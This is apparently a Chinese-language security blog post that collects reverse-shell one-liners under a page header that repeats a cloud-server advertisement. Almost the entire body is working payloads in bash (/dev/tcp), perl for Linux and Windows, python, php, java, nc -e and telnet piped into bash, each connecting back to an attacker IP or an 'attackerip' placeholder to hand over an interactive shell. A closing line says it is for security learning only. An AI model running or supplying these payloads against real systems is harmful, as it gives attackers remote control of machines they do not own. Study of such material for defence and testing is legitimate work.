雨云服务器助你轻松搭建内网穿透,解决无公网IP问题。-X黑手网
雨云服务器助你轻松搭建内网穿透,解决无公网IP问题。-X黑手网
雨云服务器助你轻松搭建内网穿透,解决无公网IP问题。-X黑手网

多姿势弹shell 不怕姿势多,就怕记不住

反弹shell是我们最便捷的与目标建立连接的方式之一。本文为大家简单的汇总下常用的shell反弹姿势,希望对您的学习有所帮助。

bash

bash -i >& /dev/tcp/192.168.123.55/8080 0>&1

perl

Linux

perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Windows

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

php

<?php
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
?>

java

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

nc

nc -e /bin/sh 192.168.123.55 1234

telnet

telnet attackerip 4444 | /bin/bash | telnet attackerip 4445

总结

本文对我们常用的shell反弹方法进行了简单的总结。具体反弹需结合实际情况而定。另外文本提供思路仅供网络安全学习和研究,反对一切危害网络安全的行为!

请登录后发表评论

    没有回复内容